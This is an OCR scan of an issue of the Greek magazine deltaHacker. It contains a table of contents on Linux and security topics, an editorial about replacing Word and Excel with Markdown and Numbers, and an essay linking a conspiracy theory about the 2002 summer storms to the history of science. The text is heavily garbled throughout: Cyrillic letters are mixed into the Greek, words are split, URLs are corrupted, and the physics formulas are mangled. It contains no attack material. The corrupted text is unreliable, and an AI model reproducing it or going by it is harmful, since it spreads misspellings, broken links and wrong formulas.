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Па ότι συμβαίνει υπάρχει πρόθεση 


ἰϑνιπη: Σημαντική αναβάθµιση του συστήματός σας, δωρεάν! 22.0... 14 


Ανίχνευση αδυναμιών µε το καινούργιο ОрепуА5 


Ενεργοποίηση του nested virtualization για то KVM .... 


То 


Πώς επανακαθορίζουµε ξεχασμένο root password στο Linux 


Гр 


Αυτοματοποιηµένες εγκαταστάσεις µε το ΑΙΙΟΥΒΘΤ ..............ы 


Στην αγαπημένη σας διανομή Linux ο window manager είναι το λογισμικό που ελέγχει την 
τοποθέτηση και την εμφάνιση των παραθύρων στην οθόνη, στο πλαίσιο του χρησιµοποι- 
ούμενου περιβάλλοντος γραφικών. О window manager παίζει σηµαντικό ρόλο σε αυτό 
που ονομάζουμε "εμπειρία χρήσης" και σε γενικές γραμμές κάνει τη ζωή µας ευκολότερη. 


Προς та τέλη του περασμένου Απριλίου κυκλοφόρησε η πιο πρόσφατη έκδοση του Kali, 
της δημοφιλούς διανομής Linux για digital forensics και penetration testing. Μεταξύ των 
ανανεωμένων χαρακτηριστικών του Ка! Linux είναι η συμπερίληψη του ОрепуА5 9 στα 
repositories της διανομής. 


Σε κάποιες περιπτώσεις χρειάζεται να τρέχουμε εικονικές μηχανές μέσα σε εικονικές 
μηχανές. Κάτι τέτοιο ίσως ακούγεται περιττό ή/και άσκοπο, στην πραγματικότητα όµως 
δεν εἶναι τίποτε από τα δύο. 


WannaCry του Шпих KAL п εκμετάλλευσή тоо ...................................--.--------ειεεεέεένέέόέέόνεόνοόνοννν. 


πρόσφατη ιστορία µε το WannaCry, το ransomware που ταχύτατα μόλυνε εκατοντάδες 
χιλιάδες υπολογιστές Windows σε όλο τον πλανήτη, θύμισε σε πολλούς πόσο σηµαντικό 
είναι να διατηρούµε το λειτουργικό µας σύστηµα ενημερωμένο. Αλλά ευπαθή δεν αποδει- 
νύονται µόνο τα μηχανήματα µε Windows. 


бте ήταν η τελευταία φορά που µε τρόμο συνειδητοποιήσατε ότι δεν θυμόσαστε το root 
password σε υπολογιστή µε Linux; Όσο άσχετο κι αν σας φαίνεται то ερώτημα (ή όσοκιαν 
ντρεπόσαστε να παραδεχτείτε ότι την έχετε ήδη πάθει), ας σημειώσουμε OTL το να ξεχά- 
OEL κάποιος το συνθηματικό του διαχειριστή δεν εἰναι κάτι που συμβαίνει σπάνια. 


Οινεοφερµένοι στον κόσµο του Шпих συχνά ακούτε και διαβάζετε ότι πρέπει να κατεβά- 
сете το τάδε ISO image και μετά να το γράψετε σε Ср, DVD ή USB stick. Па τέτοιες δου- 
λειές παλιότερα χρησιμοποιούσαμε δισκάκια CD/DVD, σήμερα όµως είναι προτιµότερονα 
K 

a 


αταφεύγουµε σε USB sticks. Σε κάθε περίπτωση, η εγγραφή αρχείου ISO δεν σηµαίνει ότι 
πλά то αντιγράφουµε στο νέο μέσο. 


Είστε υπεύθυνος για την εγκατάσταση διανομής Linux σε όλους τους υπολογιστές ενός 
τοπικού δικτύου. Δεχτείτε παρακαλούμε τα συγχαρητήριά µας -- και καλό σας κουράγιο. 
Κάθε γνήσιο geek σίγουρα χαίρεται όταν του δίνεται η ευκαιρία να χαρίσει ζωή σε µια 
μηχανή, ξεκινώντας ре την εγκατάσταση του OS. Τι γίνεται όµως όταν αντί για έναν ή δύο 
υπολογιστές έχουµε πέντε, δέκα ή ακόµη και περισσότερους; Ποιος µπορεί να αντέξει 
τόση χαρά, ειδικά όταν υπάρχει και deadline; 
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Αρχισυντάκτης Παναγιώτης Βαρελάς 
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άψτε αρχεία ISO σε USB sticks, апо οποιοδήποτε 05... 


Σύνταξη Παναγιώτης Βαρελάς, Χρήστος Βαρελάς, Πάνος Γεωργιάδης, Γιώργος Γιάννου, Γιάννης Κρομμύδας, Πέτρος Κυλαδίτης, 
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Το ψηφιακό περιοδικό deltaHacker είναι συνδρομητικό και εκδίδεται апо την Parabing Creations. О δικτυακός τόπος του περιοδικού είναι στο 
https://deltahacker.gr και το email επικοινωνίας είναι το talk2us@deltahacker.gr. Οι γενικές πληροφορίες για τις συνδρομές παρατίθενται στο 


https://deltahacker.gr/order κι апо την ἴδια σελίδα γίνονται οι παραγγελίες. 


πος 
DigitalOcean 


Ταχύτατα VPSes oto cloud, σε hosts ue δίσµους SSD. 
Επιβογή datacenter σε Ευρώπη, Арерікп ка! Ασία. 
| вап-тпеап control panel, για απόῆυτο έβεγχο. 


Αποητήστε τώρα το δικό oas VPS, 

στο cloud της Оідіќа[Осеап. 

Κάντε KAIK στο http://bit.ly/digocean10off 
και κερδίστε αυτομάτως 105 σε credit. 


Hint: Επιβέγοντας το µιμρό πϑάνο, 

πάντα με μῆιη στο http: /ΡΙΙ. ly/digocean1 бон, 
ουσιαστιµά έχετε δύο µήνες δωρεάν για ένα VPS 
µε 512MB RAM, 20GB SSD ка! ТТВ transfer. 


В Δεν είναι кі άσχημα 
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Όχι πια VTOK, μόνο εμ-ντι 


του Χρήστου Βαρελά 


Φίλες και φίλοι, 


= Έχουν περάσει αρκετά χρόνια από την εποχή που χωρίς κανένα δισταγ- 
uó κατέφευγα στην "беу ἔχω λεφτά για software" δικαιολογία, ώστε уа 
τρέχω εμπορικό λογισμικό χωρίς να δίνω ούτε (µια δραχμή|ἑνα ευρώ). 


Είμαι πολύ καιρό σε ηλικία "μπορώ να πληρώνω για το software που 
χρειάζομαι”, και καθόλου беу χαλιέμαι. Όταν, π.χ., λίγα χρόνια πριν η 
Microsoft υιοθέτησε συνδρομητικό μοντέλο χρήσης για το Office, про- 
θυµα επέλεξανα αποκτήσω κι εγώ τη συνδρομή µου. Το σκεπτικό ήταν 
ότι ήθελα να δουλεύω χωρίς τύψεις µε та Word κι Excel, ενώ беу είχα 
καμία όρεξη να ψάχνω για σπασµένες εκδοχές που σήµερα παίζουν, 
αύριο δεν παίζουν. Όχι. Προτιμούσανα έχω το κεφάλι µου ήσυχο και να 
κάνω τη δουλειά µου όμορφα κι ωραία - ἡ έστω уа προσπαθώ να την 
κάνω ӧрорфа κι ωραία. 


Είναι φυσικά και το άλλο: Από τη στιγµή που ο κατασκευαστής της 
σουίτας ζητά χρήματα -και μπράβο του-, γιατί εγώ να µην πληρώνω; 
Αν για οποιονδήποτε λόγο δεν θέλω ή δεν μπορώ, υπάρχουν ωραιό- 
τατες εναλλακτικές δωρεάν προτάσεις, όπως, TX., το LibreOffice 
(https://www.libreoffice.org). Ау беу µου κάνει το LibreOffice (που na- 
ρεμπιπτόντως δεν µου κάνει και το αντιπαθώ έντονα), τότε ψάχνω για 
εναλλακτική δωρεάν λύση. 


Κάπως έτσι βλέπω τα πράγματα, φίλες και φίλοι. 


Μόνο που έναν περίπου μήνα πριν σταμάτησα και пал. ға πληρώνω για 
το Office. 


Δεν ανανέωσα την ετήσια συνδρομή µου, αλλά µη φανταστείτε ότι ETÉ- 
στρεψα στην παρανομία (υποχρεωτικά air quotes εδω). 


Συχνά σκεφτόμουν ότι та Word κι Excel είναι πολύ περισσότερο feature 
rich για тіс ανάγκες µου. Είναι σαν να χρησιμοποιείς κανόνι για να πυρο- 
βολήσεις ένα σπουργίτι, όπως κάποτε είχε πει αγαπητός συνάδελφος 
σε άλλον, επίσης αγαπητό συνάδελφο. Αν και δεν ήμουν ποτέ φίλος του 
κυνηγιού, το νόημα της παρομοίωσης ήταν και παραμένει 110% ταιρια- 
στό και για την περίπτωση που τώρα σας λέω. 
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= Αφού λοιπόν για Ta κείµενα που έγραφα και τα λογιστικά φύλλα που OU- 
ντηρούσα τα Мога κι Excel ήταν (κι εξακολουθούν να είναι) overkill, γιατ 
μέχρι πρότινος τα χρησιμοποιούσα; 


үннің 


= Ίσως γιατί αμφότερες οι εφαρμογές δουλεύουν καλά, υπό την έννοια ότι 
беу κρασάρουν σχεδόν ποτὲ και ταυτόχρονα αποκρίνονται γρήγορα και 
προβλέψιμα. Επίσης, éva ἄλλο θετικό µε τη συνδρομή που πλήρωνα στη 
Microsoft, ήταν ότι διατηρούσα το δικαίωµα να εγκαθιστώ то Office σε 
РС, Mac, iOS κι Android. Σχεδόν πάντα συνηθίζω να δουλεύω бе τουλάχι- 
στον δύο απότις τέσσερις αυτές πλατφόρμες, οπότε καταλαβαίνετε ότι 
η προσφερόµενη δυνατότητα δεν μπορούσε να περάσει απαρατήρητη. 


= Την ίδια στιγµή διακατέχομαι κι από ισχυρές τάσεις μινιμαλισμού. Υπάρ- 
χουν μάλιστα περίοδοι κατά τις οποίες οι τάσεις αυτές θυμίζουν εμμο- 
νή. Πρόσφατη εκδήλωση κραυγαλέου μινιμαλισμού από μέρους µου, 
ήταν η υιοθέτηση του 13 window manager για τα συστήµατα Linux που 
καθημερινά χρησιμοποιώ (https://deltahacker.gr/?p=17547). Πριν апо 
τον ІЗ, ἔβλεπα συναδέλφους να δουλεύουν µε το tMUXKAL πωρωνόμουν 
(https://github.com/tmux/tmux/wiki). Παλιότερα, θυμάμαι ότι αδιαφο- 
ρούσα για όλους τους torrent clients και χρησιμοποιούσα αποκλειστικά 
то rtorrent (https://github.com/rakshasa/rtorrent/wiki). Την περασμένη 
άνοιξη έπρεπε να στήσω éva Серһ virtual cluster για εκπαιδευτικούς 
λόγους και testing. Ενώ για τη δηµιουργία και τη διαχείριση εικονικών 
δικτύων και QEMU/KVM VMs κάλλιστα θα μπορούσα να καταφύγω στον 
Virtual Machine Manager, αποφάσισα και δούλεψα αποκλειστικά από τη 
γραμμή εντολών. (Εκτός από την ικανοποίηση του αισθήματος µινιµα- 
λισμού, η απόφαση αυτή είχε κι άλλα οφέλη. Δεν εἰναι του παρόντος, 
οπότε беу τα αναφέρω τώρα) 


" Στο ίδιο μήκος κύματος, λοιπόν, εδώ και λίγο καιρό σκεφτόμουν πώς θα 
καταφέρω να παραμερίσω та Мога κι Excel και βεβαίως µετιθατααντι- 
καταστήσω. Τελικά το Excel το αντικατέστησα µε το Numbers, το οποίο 
διατίθεται δωρεάν για τους υπολογιστές και τις συσκευές της Apple 
(https://www.apple.com/lae/numbers). Είναι απλό, γρήγορο, µπορεί να 
ανοίγει αρχεία του Excel, να κάνει export στα αντίστοιχα format, ενώ βε- 
βαίως υποστηρίζεικαιτο δικότου file format. То Өёра ре то Numbers είναι 
ότι τρέχει μόνο бе Мас OS X και 105. Σε σχέση µε то Excel, λοιπόν, тора 
πρέπει να λαμβάνω υπόψη την πλατφόρμα στην οποία βρίσκομαι και να 
σκέφτομαι δύο φορές πριν κάνω κάτι. Αλλά η κατάσταση беу εἰναι τόσο 
τραγική. Όποτε έχω να κάνω επεμβάσεις σε κάποιο λογιστικό φύλλο 
και βρίσκομαι σε Linux ή σε Windows (σπάνιο), υπάρχει και το LibreOffice. 
Επίσης, ταλογιστικά φύλλαπου κατά κύριολόγο δουλεύω, συγγενεύουν 
περισσότερο µε βάσεις δεδοµένων пара µε spreadsheets. О παροπλι- 
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σμός του Excel, λοιπόν, θέλω να ελπίζω Оті Ва µε παρακινήσει στο να σχε- 
διάσω, επιτέλους, µια ή δύο βάσεις για τη MariaDB (һіїрѕ://тагіаар.ого). 
Βέβαια ακόµη κι αφού το κάνω, η ανάγκη για μερικά απλά spreadsheets θα 
παραμένει. Αλλά προσέξτε: μιλάμε για απλά spreadsheets, τα οποία οποια- 
δήποτε σχετική εφαρµογή µπορεί και τ' ανοίγει εύκολα. 


= Και ре то Мога τι κάνουμε; Н αλήθεια εἰναι ότι το Мога το χρησιμοποιώ 
περισσότερα χρόνια απ’ όσα μπορώ να θυμηθώ. Κατά καιρούς είχα mpo- 
σπαθήσει να το αντικαταστήσω µε άλλες εφαρμογές - κι αυτή τη στιγμή 
στο νου έρχονται λέξεις όπως WordPerfect και StarWriter. Μετά όµως από 
κάθε απόκλιση ἡ ἔστω σκόπιμη εκστρατεία εξερεύνησης, πάντα στο Мога 
γύριζα. Ανέκαθεν η εφαρµογή δούλευε καλά για μένα, ασχέτως της πολυ- 
πλοκότητας των κειμένων που είχα να προετοιµάσω. Н μόνη φορά που µε 
θυμάμαι να βρίζω και να καταριέµαι то Word, ήταν όταν ένας καθηγητής, 
στο Πανεπιστήμιο, µου είχε ζητήσει να πληκτρολογήσω στο κομπιούτερ 
(ἑτσιταλέγαμετις Παλιές Καλές Μέρες") éva ολόκληρο βιβλίο Γραμμικής 
Άλγεβρας, κι άλλο ένα περί θεωρίας αυτομάτων, γλωσσών και үрарраті- 
κών (πάντα για Μαθηματικά μιλάμε). Είχα σκεφτεί ότι θα γράψω σε LaTeX 
(https://www.latex-project.org) και πολύ είχα χαρεί, όµως о κος καθηγητής 
είχε άλλα σχέδια: τα βιβλία -αμϕότερα δικά του, παρεμπιπτόντως--, ἠθε- 
λε να та έχει σε DOC format. Ξεκίνησα µε όλη την καλή διάθεση, αναλογι- 
ζόμενος ότι μπροστά µου έχω µια πρώτης τάξεως ευκαιρία για να δοκιµά- 
ow καλά τον αγαπημένο Equation Editor σε πραγματικές συνθήκες (https:// 
en.wikipedia.org/wiki/Microsoft_Office_shared_tools#Equation_Editor). 
Πολύ γρήγορα συνειδητοποίησα ότι то РС µου χρειαζόταν τουλάχιστον τη 
διπλάσια ВАМ ώστε να ξεχάσει αυτή την εμμονή µε το swapping, ενώ και 
µια ταχύτερη κάρτα γραφικών σίγουρα Өа βοηθούσε σηµαντικά. Περιττό 
να σημειώσω ότι δυνατότητα για αναβάθμιση δεν υπήρχε. Καταλαβαίνετε 
λοιπόν ότι αν το Υπέρτατο Ον, αυτό που αποφασίζει για το πού паре µετά, 
µε πρόσεξε έστω και λίγο τον καιρό εκείνο, τώρα που μιλάμε έχω διασφα- 
λισμένη τη θέση µου σε ένα άβολα ζεστό µέρος. 


= Παιδεύτηκα λίγο µε το ζήτημα της αντικατάστασης του Мога, ώσπου ξαφ- 
νικά συνειδητοποίησα ότι η λύση είναι μπροστά στα μάτια µου (ή κάτω 
από τα δάκτυλά µου, µιας και μιλάμε για πληκτρολόγηση). Δεν αναφέρο- 
μαι σε κάποια εναλλακτική εφαρµογή, αλλά στη γλὠσσα υποσηµείωσης 
Markdown, την οποία εδώ κι αρκετό καιρό ούτως ή άλλως χρησιμοποιώ 
(https://deltahacker.gr/?p=10306). Χωρίς кала καλά να το συνειδητοποιή- 
ow η Markdown ήλθε κάποια στιγµή στην καθημερινότητά µου - κι απ' ότι 
όλα δείχνουν έχει έλθει για να μείνει. Το site του περιοδικού, για παρά- 
δειγµα, βασίζεται στο WordPress. Ένα από τα plugins που έχουµε μονίμως 
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ενεργοποιημένο εἰναι το Jetpack (https://jetpack.com). Στις δυνατότητες 
του Jetpack συμπεριλαμβάνεται η υποστήριξη της Markdown, «στε από то 
back-end του WordPress να δηµοσιεύεις απευθείας άρθρα γραμμένα στην 
εν λόγω γλὠσσα. Πα μήνες τώρα, έτσι δημοσιεύουμε στο site: γράφουμε 
απευθείας σε Markdown, ξεκινάμε νέο post στο WordPress κι αντιγράφου- 
με απευθείας τον "κώδικα” Markdown στο σχετικό πλαίσιο. Πρέπει να on- 
µειώσω εδώ ότι та παραγόμενα κείµενα, αυτά που βλέπουν οι επισκέπτες 
του deltaHacker, δείχνουν πολύ καθαρά κι όμορφα. Εντάξει, ίσως το theme 
στο site να ανήκει σε προηγούµενη δεκαετία, νομίζουμε όµως ότι τα κεί- 
µενα αυτά καθεαυτά είναι ευπαρουσίαστα κι άνετα στην ανάγνωση. Σε 
Markdown γράφω κι όταν, αραιά και που, αποφασίζω να δημοσιεύσω κάτι 
το προσωπικό blog (https://colder.xyz). Χρησιμοποιώ επίσης Markdown 
αι στην άλλη εργασία µου, για την παραγωγή documentation. (Προς το na- 
бу µόνο για προσωπική χρήση, κάτι µου λέει όµως ότι πολύ σύντομα Ва 
τοιµάζω documentation και για άλλους συναδέλφους. Πολλά περαστικά 
τους εύχομαι, από τώρα) 


moza 


= H Markdown, λοιπόν, εἶναι ότι πρέπει για την περίπτωσή µου. Ένας καλός 
text editor µε syntax highlighting µου έλειπε στην αρχή, αλλά πολύ γρήγορα 
(και µε πολλή χαρά) κατέληξα στον Atom -- σ αυτόν γράφονται οι γραμμές 
τούτες! (https://atom.io) Ομολογώ ότι αρχικά είχα φλερτάρει µε την ιδέα 
του міт, εἰπα όµως στον εαυτό µου ότι, εντάξει, καλές εἶναι αυτές οι pO- 
πές προς τον μινιμαλισμό, беу χρειάζεται όµως να τις ακολουθώ και µε 
θρησκευτική ευλάβεια. 


= Προς το παρόν, ο μόνος που έχει παραπονεθεί γί αυτά τα αρχεία md είναι 
ο αγαπητός art director του περιοδικού. (Αυτά τα ωραία PDF των τευχών; 
(ћ11рѕ://деіїаһаскег.9г/?р=13867) Е, δικά του πονήματα εἰναι) Н αλήθεια 
είναι ότι τον βολεύει πολύ περισσότερο να του παραδίδουµε αρχεία DOC. 
Δεν εἶναι ότι δεν µπορεί у ανοίξει ή να κατανοήσει αρχεία та. Απλά, το 
InDesign СС που δουλεύει µπορεί και διαβάζει DOC, αλλά ох. та. H προσω- 
ρινή λύση που εφαρμόζουμε беу είναι η κοµψότερη δυνατή, αλλά τουλάχι- 
στον δουλεύει. Ας είναι καλά то Pages (https://www.apple.com/lae/pages) 
και η προθυμία κάποιων για λίγο manual work (ναι, στα αγγλικά, γιατί η 'χει- 
ρωνακτική εργασία" ακούγεται κάπως). 
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Αγαπητοί µου, 


"растау που λέτε το πρωί όλοι κάθ’ ὅλα έτονμον, µε το κλειδί, 
στο χέρν καν όλα τα συμπράγκαλας βᾶλίτσες, βαλιτσόπουλα, κουτιά, 
σαν-βοναγιάζ, ταπεράκια, σακούλες, βατραχοπέδιλα, αντηλιακόὀ. Θα 
φεύγαμε για το σταθμό του ΚΤΕΛ αλλά κάτι έλειπε, το ένονωθα, καν 
δεν ἤξερα τι. 

Το κατάλαβα µε το που πλειδώναμε την πόρτα. "Αμάν!", φώναξα, "η 
γραφομηχανή!" 

"Μα τι την θέλεις την ὙραφομηχανήΣ" να ρωτάεν επνευρισµένη η pn- 
τέρα της εξαδέλφης, που είναν ινδουίστρια. "Τόσους μήνες την είχες 
να σκονίζεταν. Ту σε έπνασε TUPAS" 

Να σας πω την αλήθεια, πραγματικά. δεν ξέρω жу εγώ τν µε έπιασε. 
Κάποιο προαίσθηµα, ἰσως} Γιατί ---σύμπτωση ороүв;-- µε то που 
μπαίνουμε στο λεωφορείο µου στέλνεν φυρμάνν ο Κύρνος Διευθυντής, 
πως καλό θα ήταν να του έχω ετονµάσει την επιστολή πριν τελειώσει ο 
μήνας. 

Έτσι λονπόν, να 'µαστε στο Πόρτο Гериеуоб, έτονµον να απολαύσουμε 
τις πρώτες στιγμές των φετινών µας δνακοπών, Ἀν εγώ στον βρεγμένο 
πάγκο µε τη γραφομηχανή. 

0 πάγκος βρεγμένος γιατί προ ολίγον εἴχαμε μίαν ακόμα παλοκαι- 
ρινή νεροποντή, σαν αυτές που συνηθίζει φέτος τον Ιούλιο. 

Λοιπόν, αυτό φέτος µε τις νεροποντές µου θύμισε το καλοκαίρν του 
2002. Δεν ξέρω αν το θυμάστε. 

Κάθε πρωί χαρά θεού. Έλιος, τζιτζίκνα, καύσωνας. Κάθε μεσημέ- 
рь, γύρω στις 5, ο ουρανός σκοτεύνναζε, μαζεύονταν алб το πουθενά 
ибт, απίστεντα σύννεφα, πατράμµν, καν ξεκίναγε ша. απίστευτη μπόρα. 
Κάθε μέρα. Για μισή ώρα, όχι παραπάνω. Κατά τις 4 ο ήλιος ήταν καν 
πάλν ψηλά στον ουρανό. Σύννεφα πουθενά. Μόνο στους δρόμους καν 
τα πεζοδρόμια έβλεπες τις πηγάδες µε το νερό καν θυμόσουν πως προ 
ολίγου μόλις γυνότανε χαμός. 

То πράγμα συνεχίστηκε για εβδομάδες. Αν θυμάμαι καλά µας είχε 
πάεν ἐτσν μέχρν τον Αύγουστο. Είχαμε όλον σαστίσεν. Είχα έναν φίλο 
ευδικά πον το φαινόμενο τον εἶχε προβληματίσεν πολύ. 

"λεν µπορεί να είναν τυχαίο", µου έλεγε. "Πώς µπορεί να εἶναι τυ- 
xalo; Μα κάθε μεσημέρι; Την ἴδια ώρα; Ῥαντεβού έχουν τα σύννεφα; 
Λιαβασμένος άνθρωπος, δεν το βλέπεις πως δεν µπορεί να είναν τυ- 
χαίος" 

"Е, καν τότε TL3" του έλεγα εγώ. "Αν δεν εἶναι τυχαίο τι είναν»" 


"Ер, εδώ σε θέλω", ερχόταν η απάντηση. Αλλά δεν µου έλεγε. Н δεν 
ήξερε ἡ δεν έλεγε. 
Δύο χρόνια αργότερα, το καλοκαίρν του 2004, πάνω που ετοιµα- 
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ζόμουν να φύγω για να βρω τον ανιυφιό στο Λονδίνο (καν να αποφύγω τους Ολυμπιακούς), 
μου τα αποκάλυφε όλα. 


Ον προγραμματισµένες βροχές του Ιουλίον 2002, ξεκίνησε να µου λέει, ήταν µέρος 
ενός σχεδίου των Αμερικάνων. Ον Αμερικάνον διαθέτουν εδώ καν δεκαετίες υφηλή τεχνο- 
λογία ελέγχον των μετεωρολογικών φαινομένων, αυτό είναι γνωστό. (Βίναν; Έστω.) Ον 
συγκεκρυμένες καταιγίδες ήταν προγραμματισμένες, WG µέρος της προσπάθειάς τους να 
επφοβίσουν τις Ελληνικές Αρχές εν όφεν των Ολυμπιακών Αγώνων. Ον Αμερικάνοι µας έδει- 
χναν πονος κάνει κουμάντο. Μας προεινδοπονούσαν Өту, оу δεν συνεργαστούμε, έχουν την 
τεχνολογία να τα κάνουν όλα μαντάρα, оло μετεωρολογικής πλευράς, καν να οδηγήσουν 
τους Ολυμπιακούς σε αποτυχία. 

Тоу ευχαρίστησα που μοιράστηκε μαζί µου αυτή του την θεωρία καν μπῆκα γρήγορα 
γρήγορα στο αεροπλάνο. 

Έφυγα yra να πάω σε ша, άλλη χώρα όπου ον καθημερινές βροχές τον Ιούλιο είναι συ- 
νηθνσµένο φαινόμενο καν δεν χρειάζεται να καταφύγεις σε, хрр, τολμηρές ερμηνείες µε 
μυστικές υπηρεσίες, βλοσυρούς επιστήμονες, σκοτεινά συμφέροντα καν συγκεκαλυμμένες 
απειλές. 


Καθνσμένος νωρίτερα σήμερα στο λεωφορείο, έχοντας μόλις λάβεν το φιρμάνι γνα την 
καινούργια επιστολή, καν εντυπωσνασμµένος από την σύμπτωση να έχω φάξεν να βρω τη 
γραφομηχανή πριν φύγουμε (σύμπτωση πράγματι»), αναλογιζόμουν γνα τους λόγους που 
μας κάνουν επιρρεπείς στους πλεκτανολογικούς µανάνδρους. 

То θέµα έχει κάποιο ενδιαφέρον και θα άξιζε ο κόπος να το δούμε алб λίγο πιο κοντά. 


Λουπόν, το φαινόμενο δεν µπορεί να εξηγηθεί αν δεν έχουµε πρώτα αναγνωρίσει ένα 
άλλο συνοδευτικό διανοητικὀ φαινόμενο, πον μάλλον προηγείται. θα το ονόµαζα fuzzy 
pattern recognition. 


Ἡρόκενταν για το φαινόμενο εκείνο που επιτρέπει στους µετεωρολόγους, ας πούμε, να 
ταξινομούν τα σύννεφα. Αν δεν ξέρεις алб αυτά, όλα τα σύννεφα μοιάζουν tóra. Λίγο πιο 
μαύρα, λίγο πιο άσπρα. Αλλά κατά βάση ἴδια. 


Όμως στην πραγματικότητα τα σύννεφα έχουν ξεκάθαρα ονόµατα (θύσανοι, σωρείτες, 
στρώματα, σωρειτομελανίες κ.λπ. Χ.λπ.), Χαν OL μετεωρολόγοι έχουν λίγο πολύ σαφείς θε- 
ωρίες πον εξηγούν καν το γνατί λέγονται έτσι καν το πώς έχουν σχηματιστεί. 

Н γνώση αυτή δεν κατακτήθηκε оло τη µία μέρα στην ἄλλη. Χρειάστηκαν δεκαετίες 
συζητήσεων κατά τον δέκατο ένατο αιώνα, προκειµένου να συμφωνήσουν ον ενδιαφερό- 
μενον για τα σηµαντικά χαρακτηριστικά των σύννεφων καν την ονοματολογία τους. Εδώ 
κολλάεν αυτό πον ονόµασα pattern recognition. Ον μετεωρολόγον περιμένουν να δουν, 
καν αναγνωρίζουν όταν βλέπουν, συγκεκριµένα pattern: θυσάνους, σωρείτες καν λοιπά. 
Στην αρχή όμως συζητούσαν, καν πολλές φορές διαφωνούσαν, γνα το ποιο ακριβώς είναι 
το pattern. Εξ ου και το ΓΣ. 


Fuzzy pattern recognition, λοιπόν. 


Αλλά δεν θα αρκούσε αυτό. Γνα να επννοηθεί η μετεωρολογία χρενάζεται να έχεν ήδη 
γίνει ένα ακόµα διανοητικό βήμα. Χρειάζεταν να έχει γίνεν αποδεκτή т 
ιδέα πως ο κόσμος Καν τα παρατηρούμενα σε αὐ- 
τόν φαινόμενα υπακούουν σε κάπονο 
είδος λογικής. 

Αυτή η νδέα βρίσκεταν στην καρ- 
διά κάθε επιστημονικής δραστη- 
ρνότητας. La κάθε φαινόμενο ἡ 
αντικείµενο πον η επιστήμη µελε- 
τά, νπάρχεν η πεποίθηση πως κάπου 
υπάρχεν κάπονα εξήγηση, νσχύεν κά- 
ποιος νόμος. Ги αυτό καν τα μελετάμε 
άλλωστε. Αν πραγματικά πιστεύαμε оту 
το τάδε ἡ то δείνα φαινόμενο είναν 
απολύτως τυχαίο, беу θα τα μελετού- 
σαµμε καθόλου. Δεν θα άξιζε ο κόπος. 
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AUTÓ ισχύει ακόµα καν για τα χαοτικά φαινόμενα. Καν εδώ η ne- 
KOLONON είναν πως, πίσω алб το εμφανές χάος, υφίσταται κάποια λο- 
үх. 

Н επιστημονική έρευνα, λουπόν, ξεκινάεν απὀ την πεποίθηση (αξί- 
ора) πως о κόσμος είναι ερμηνεύσιµος, συνεχίζει µε fuzzy pattern 
recognition, καν καταλήγει στον προσδιορισμό των σημαντικών µε- 
γεθών παν παραμέτρων του εκάστοτε φαινομένου, των σχέσεών τους 
παν των νόμων πον διέπουν αυτές τις σχέσεις. Καρπός της επιστηµο- 
νυκής έρευνας είναν ένα κατά το δυνατόν αντιπροσωπευτικό µαθηµα- 
τυκὀ μοντέλο του υπό µελέτη φαινομένου. 


Ον νουλιάτικες καταιγίδες του 2002 δεν αποτελούσαν αίνιγμα yla 
τους µετεωρολόγους. Н ερμηνεία ήταν απλή καν είχε κάτι να κάνεν µε 
τις μετακινήσεις αέρνων μαζών оло το βορρά, τις προὐπάρχονσες (καν 
αναμενόμενες γιὰ την εποχή) υφηλές θερμοκρασίες στην Ελλάδα, τους 
αντυκυκλώνες λόγω της διαμόρφωσης του εδάφους κ.λπ. Ἠελπ. 

0 φίλος μου όμως αδιαφορούσε για όλα αυτά. Δεν τον αρκούσε η 
μετεωρολογική εξήγηση του φαινομένου. Έφαχνε να βρει την κρυφή 
πρόθεση. Έφαχνε να αποκαλύφεν την πλεκτάνη. 

Πώς μπορούμε να το καταλάβουμε αυτό; 


Αυτή η ιδέα, πως ο κόσμος υπακούει σε κάποιο εἶδος λογικής, η 
οποία µπορεί να περιγραφεί µε την βοήθεια μεγεθών, παραμέτρων, 
νόμων Χ.λπ., δεν είναι τόσο αντονόητη όσο φαίνεταν. Βασίζεται µε 
την σειρά της σε шоу ακόµα παραδοχή: πως τα μεγέθη καν ον παρά- 
µετροι του κόσμον αυτού μπορούν να μετρηθούν --να αντιστονχη- 
θούν, δηλαδή-- σε αριθμούς ἡ σε σειρές αριθμών σε κάποια κλίμακα. 
Χωρίς αυτή την δεύτερη παραδοχή, ον επιστημµονικοί νόμον όπως, για 
παράδειγµα, о νόμος της επιτάχυνσης (Е = πι х ү) ἡ ου εξισώσεις του 
Einstein (Е = m x ο΄ 2), θα ήταν κενοί περιεχοµένου. 

Ἡρόκενταν үш µία оло τις δύο σημαντικότερες διαφορές μεταξύ 
της νεωτεριχής επιστήμης (της επιστήμης από τον Γαλιλαίο жол µετά) 
παν της επιστήμης των αρχαίων Ελλήνων. Ον αρχαίον ημών δεν ενδι- 
αφέρονταν για τη µέτρηση των μεγεθών, αλλά γνα την σύγκριση καν 
το ποιόν τους. Δεν τους ενδιέφερε το "πόσο". Τους ενδιέφερε το περί 
τίνος πρὀκενταν. То αν εἶναι μεγαλύτερο ἡ πιο μικρό. То αν είναν βα- 
ρύτερο ἡ πιο ελαφρύ. 

Παράδειγμα; Н γεωμετρία. То εργαλεία του γεωμέτρη ήταν о xé- 
ρακας και ο διαβήτης, όχν το μοιρογνωμόννιο οὔτε το υποδεκάµετρο. 
То εργαλείο του μηχανικού ἦταν ο ζυγός. Δεν σου έλεγε ποιο είναν το 
βάρος κάποιον πράγματος. Σον έλεγε NOLO από δύο πράγματα είναν 
βαρύτερο. 

Αυτή εἴναν η µία διαφορά. 

H δεύτερη θεμελιώδης διαφορά της αρχαίας επιστήμης απὀ τη νε- 
ωτερική είχε να κάνεν µε την αντίληφή της γνα τον ίδιο τον κόσμο. 
Κατά τους αρχαίους ο κόσμος δεν ήταν ενιαίος. Άλλα πράγματα ἰσχυ- 
αν ᾠηλά στον Ουρανό, καν άλλα πάνω στην Γη. 0 хосрос των ουράνιων 
σωμάτων ἥταν κατά τους αρχαίους άπειρος, αρµονικός, αέναος, αμε- 
τάβλητος. О επίγενος κόσμος από την άλλη ήταν προσωρινός, ατελής, 
πεπερασμένος, μεταβαλλόμενος. 


Για τους αρχαίους, όλες οι µεταβολές στον επίγειο κόσµο (σα- 
φής απόδειξη της ατέλειάς τον) γίνονται επειδή κάτι τις προκαλεί. 
Υπάρχουν αιτίες жол υπάρχουν αποτελέσµατα. Ον µεταβολές διαρκούν 
επί όσο χρειάζεται μέχρν να επιτευχθεί ξανά η νσορροπία που brata- 
ράχτηκε από τον άλφα ἡ το βήτα λόγο. Н πέτρα, για παράδειγµα, θα 
κατρακυλήσει επειδή την κλὠτσησες, αλλά αµέσως θα βρει κάπου να 
ηρεμῆσεν. Өс. μείνεν EXEL μέχρν να την πουνήσειν κάτι άλλο. Αν δεν την 
